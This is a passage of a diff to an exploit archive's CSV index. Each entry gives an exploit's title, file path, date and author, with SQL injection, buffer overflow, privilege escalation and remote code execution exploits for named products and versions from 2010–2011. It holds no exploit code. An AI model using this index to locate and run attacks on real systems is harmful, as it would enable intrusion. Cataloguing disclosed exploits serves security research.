Directory 2.0 Database Disclosure Exploit (.py)",2010-10-16,ZoRLu,aix,dos,0 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload Vulnerability",2010-10-15,saudi0hacker,php,webapps,0 15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 @@ -13231,41 +13287,36 @@ id,file,description,date,author,platform,type,port 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData <= 7.2.7.3806 - Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB <= 6.5.0.3 - Denial of Service Vulnerability",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 -15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0 -15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)",2010-10-16,ZoRLu,aix,dos,0 15265,platforms/asp/remote/15265.rb,"ASP.NET Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Windows NTLM Weak Nonce Vulnerability",2010-10-17,"Hernan Ochoa",windows,remote,0 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0 -15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0 -15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0 +15609,platforms/windows/local/15609.txt,"Windows Vista/7 - Elevation of Privileges (UAC Bypass) (0day)",2010-11-24,noobpwnftw,windows,local,0 +15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker $ORIGIN expansion Vulnerability",2010-10-18,"Tavis Ormandy",linux,local,0 +15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0 +15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0 -15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0 -15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 -15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0 -15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 +15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0 +15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0 15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0 +15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0 15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0 15295,platforms/php/webapps/15295.html,"sNews CMS - Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory corruption (0day)",2010-10-21,Abysssec,windows,remote,0 15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 and 6.5 Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 -15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0 -15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0 -15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0 15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT - Arbitrary DSO Load Vulnerability (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0 15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 - (.m3u) Denial of Service Vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0 15306,platforms/win32/dos/15306.pl,"AnyDVD <= 6.7.1.0 - Denial of Service",2010-10-23,Havok,win32,dos,0 -15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0 15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 Persistent XSS Vulnerability",2010-10-24,"Th3 RDX",php,webapps,0 15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection Vulnerability",2010-10-24,ZonTa,php,webapps,0 15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 @@ -13296,6 +13347,7 @@ id,file,description,date,author,platform,type,port 15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0 +15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15341,platforms/multiple/dos/15341.html,"Firefox Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 15342,platforms/multiple/dos/15342.html,"Firefox Memory Corruption Proof of Concept (Simplified)",2010-10-28,extraexploit,multiple,dos,0 @@ -13336,23 +13388,24 @@ id,file,description,date,author,platform,type,port 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0 15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0 -15393,platforms/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service Vulnerability",2010-11-02,moigai,windows,dos,0 15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0 15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15396,platforms/asp/webapps/15396.txt,"Comrie Software Pay Roll Time Sheet & Punch Card Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15397,platforms/asp/webapps/15397.txt,"Online Work Order System (OWOS) Professional Edition Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 +15393,platforms/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service Vulnerability",2010-11-02,moigai,windows,dos,0 15398,platforms/asp/webapps/15398.txt,"Digger Solutions Newsletter Open Source SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15399,platforms/asp/webapps/15399.txt,"Site2Nite Business eListings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15400,platforms/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 +15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0 15403,platforms/windows/local/15403.py,"Minishare 1.5.5 - Buffer Overflow Vulnerability (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 +15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow Vulnerability (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script Arbitrary Local File Download Vulnerability",2010-11-03,v1R00Z,php,webapps,0 15405,platforms/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection Vulnerability",2010-11-03,Silic0n,php,webapps,0 -15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow Vulnerability (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite NtCreateKey Race Condition Vulnerability",2010-11-03,"Nikita Tarakanov",windows,dos,0 15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability",2010-11-03,"Matthew Bergin",windows,dos,0 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h Local File Inclusion Vulnerability",2010-11-03,"Salvatore Fresta",php,webapps,0 -15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - (.hta) Buffer Overflow Vulnerability",2010-11-04,anT!-Tr0J4n,windows,dos,0 15412,platforms/php/webapps/15412.txt,"eocms 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 +15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - (.hta) Buffer Overflow Vulnerability",2010-11-04,anT!-Tr0J4n,windows,dos,0 15413,platforms/php/webapps/15413.txt,"sweetrice CMS 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15414,platforms/php/webapps/15414.txt,"jaf CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection Vulnerability",2010-11-04,"High-Tech Bridge SA",php,webapps,0 @@ -13361,10 +13414,9 @@ id,file,description,date,author,platform,type,port 15418,platforms/windows/dos/15418.html,"Internet Explorer Memory - Corruption Vulnerability (0day)",2010-11-04,Unknown,windows,dos,0 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0 15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local DoS PoC (0day)",2010-11-04,"Nikita Tarakanov",windows,dos,0 -15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0 +15421,platforms/windows/remote/15421.html,"Internet Explorer 6/7/8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 -15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal Vulnerability (0day)",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service Vulnerability",2010-11-05,Sweet,windows,dos,0 @@ -13380,55 +13432,51 @@ id,file,description,date,author,platform,type,port 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0 -15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 -15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 -15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 +15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0 +15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 +15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 +15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 beta Binary Denial of Service Vulnerability",2010-11-08,41.w4r10r,windows,dos,0 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel Exploit (0day)",2010-11-08,"Nikita Tarakanov",windows,local,0 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 -15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 15466,platforms/php/webapps/15466.txt,"Joomla Component JQuarks4s 1.0.0 - Blind SQL Injection Vulnerability",2010-11-09,"Salvatore Fresta",php,webapps,0 +15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service Vulnerability",2010-11-09,"Shane Bester",multiple,dos,0 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 +15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0 15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0 15475,platforms/multiple/local/15475.txt,"IBM OmniFind Privilege Escalation Vulnerability",2010-11-09,"Fatih Kilic",multiple,local,0 15476,platforms/multiple/dos/15476.php,"IBM OmniFind Crawler Denial of Service Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0 +15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - XSS Vulnerability",2010-11-11,"Philipp Niedziela",php,webapps,0 15480,platforms/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15481,platforms/linux/dos/15481.c,"Linux Kernel Stack Infoleaks Vulnerability",2010-11-10,"Dan Rosenberg",linux,dos,0 15482,platforms/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow Vulnerability",2010-11-10,PoisonCode,windows,dos,0 15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 -15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injection Vulnerabilities",2010-11-10,"Salvatore Fresta",php,webapps,0 15488,platforms/php/webapps/15488.txt,"Landesk OS command injection",2010-11-11,"Aureliano Calvo",php,webapps,0 15489,platforms/windows/local/15489.py,"Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0 -15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - XSS Vulnerability",2010-11-11,"Philipp Niedziela",php,webapps,0 15491,platforms/osx/dos/15491.txt,"Apple Directory Services Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection Exploit",2010-11-11,"Vis Intelligendi",php,webapps,0 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - (.wav) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability",2010-11-12,Daikin,asp,webapps,0 -15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 -15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 File Disclosure Vulnerability",2010-11-12,sfx,php,webapps,0 15501,platforms/php/webapps/15501.txt,"Joomla Component com_jsupport Critical XSS Vulnerability",2010-11-12,Valentin,php,webapps,0 15502,platforms/php/webapps/15502.txt,"Joomla Component com_jsupport SQL Injection Vulnerability",2010-11-12,Valentin,php,webapps,0 @@ -13448,9 +13496,12 @@ id,file,description,date,author,platform,type,port 15518,platforms/php/webapps/15518.txt,"Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0 15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 15524,platforms/php/webapps/15524.txt,"Pre Ads Portal SQL Bypass Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 -15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro SQL Injection Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection Vulnerability",2010-11-14,v3n0m,php,webapps,0 +15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro SQL Injection Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 15532,platforms/windows/local/15532.py,"Foxit Reader 4.1.1 - Stack Buffer Overflow Exploit",2010-11-14,sud0,windows,local,0 +15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent XSS via Profile Customization",2010-11-16,MaXe,php,webapps,0 +15551,platforms/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 +15552,platforms/asp/webapps/15552.txt,"BPDirectory Business Directory Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 Exploit",2010-11-14,BraniX,windows,local,0 15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 Exploit",2010-11-14,BraniX,windows,local,0 15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 Exploit",2010-11-14,BraniX,windows,local,0 @@ -13460,9 +13511,6 @@ id,file,description,date,author,platform,type,port 15545,platforms/php/webapps/15545.txt,"Nuked-Klan Module Boutique Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0 15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0 15549,platforms/php/webapps/15549.txt,"Joomla Component (com_alfurqan15x) SQL Injection Vulnerability",2010-11-15,kaMtiEz,php,webapps,0 -15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent XSS via Profile Customization",2010-11-16,MaXe,php,webapps,0 -15551,platforms/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 -15552,platforms/asp/webapps/15552.txt,"BPDirectory Business Directory Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 15555,platforms/php/webapps/15555.txt,"Joomla Maian Media Component (com_maianmedia) SQL Injection Vulnerability",2010-11-16,v3n0m,php,webapps,0 @@ -13492,30 +13540,14 @@ id,file,description,date,author,platform,type,port 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation Vulnerability",2010-11-20,LiquidWorm,windows,local,0 15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion Vulnerability",2010-11-20,Mask_magicianz,php,webapps,0 +16087,platforms/php/webapps/16087.txt,"PMB Services <= 3.4.3 - SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 -15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 -15594,platforms/php/webapps/15594.txt,"AuraCMS - (pfd.php) SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 -15595,platforms/php/webapps/15595.txt,"jSchool Advanced Blind SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 -15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download Vulnerability",2010-11-22,Beach,jsp,webapps,0 -15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - (fckeditor) Shell Upload Vulnerability",2010-11-22,Net.Edit0r,asp,webapps,0 -15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - (.m3u8) Buffer Overflow Vulnerability",2010-11-23,anT!-Tr0J4n,windows,dos,0 -15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0 -15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 -15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 -15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0 -15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 and 2.02 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 -15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials 